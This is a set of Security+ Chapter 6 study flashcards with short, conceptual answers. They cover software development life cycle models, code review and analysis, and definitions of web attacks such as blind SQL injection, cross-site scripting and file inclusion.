click below
click below
Normal Size Small Size show me how
Security+ Chapter 6
Security+ Chapter 6 Review Questions
Question | Answer |
---|---|
Name the phases of the software development life cycle | Planning, requirements, design, coding, testing, training and transition, ongoing operations and maintenance, end of life decommissioning |
List steps in the waterfall SDLC model. | Gather requirements, design, implement, test/validate, deploy, maintain |
List four phases used in the spiral model. | Identification, design, build, evaluation |
What are the differences between Agile, Waterfall, and Spiral? | Agile software development is an iterative and incremental process, rather than the linear processes that Waterfall and Spiral use. |
List at least three principles of the Agile methodology. | • Ensure customer satisfaction via early and continuous delivery of the software • Deliver working software frequently (in weeks rather than months • Pay continuous attention to technical excellence and good design. |
Describe the continuous integration and continuous deployment pipeline. | The developer commits change, the build process is triggered, the build report is delivered, tests are run against the build, the test report is delivered, if successful, the code is deployed. |
What are APIs? | Application programming interfaces (APIs) are interfaces between clients and servers or applications and operating systems that define how the client should ask for information from the server and how the server will respond. |
What are some examples of informal code review models? | Pair programming, over-the-shoulder, pass-around code reviews, and tool-assisted reviews |
List all six phases of a typical Fagan inspection process. | Planning, overview, preparation, meeting, rework, and follow up |
What is static code analysis and what is dynamic code analysis? | Static code does not run the program, instead it focuses on understanding how the program is written and what the code is intended to do. Dynamic code analysis relies on execution of the code while providing it with input to test the software. |
What does blind SQL injection mean and what are two forms of blind SQL injection? | Attackers use a technique called blind SQL injection to conduct an attack even when they don’t have the ability to view the results directly. Two forms of blind SQL injection are content-based and timing-based. |
Give three ways that an attacker might discover a user’s password. | 1. Conducting social engineering attacks that trick the user into revealing a password. 2. Eavesdropping on unencrypted network traffic 3. Obtaining a dump of passwords from previously compromised sites |
Give some ways that an attacker might obtain a cookie. | • Eavesdropping on unencrypted network connections and stealing a copy of the cookie as it is transmitted between the user and the website. • Installing malware on the user’s browser that retrieves cookies and transmits them back to the attacker. |
What is insecure direct object reference? | If the application does not perform authorization checks, the user may be permitted to view information that exceeds their authority. This situation is known as an insecure direct object reference. |
What are two variants that file inclusion attacks come in? How do they work? | Local file inclusion and remote file inclusion. Local file inclusion attacks seek to execute code stored in a file located elsewhere on the web server. Remote file inclusion attacks allow the attacker to go a step further and execute code stored on server |
When would cross-site scripting attacks occur? | Cross-site scripting (XSS) attacks occur when web applications allow an attacker to perform HTML injection, inserting their own HTML code into a web page. |
What’s the difference between cross-site scripting attacks and cross-site request forgery attacks? | XSS attacks exploit the trust that a user has in a website to execute code on the user’s computer. XSRF attacks exploit the trust that remote sites have in a user’s system to execute commands on the user’s behalf. |
List some advantages of implementing database normalization. | • Prevent data inconsistency • Prevent update anomalies • Reduce the need for restructuring existing databases • Make the database schema more informative |
List and explain two principles we need to apply in the application resilience. | • Scalability says that applications should be designed so that computing resources they require may be incrementally added to support increasing demand. • Elasticity means that applications should be able to automatically provision resources to scale |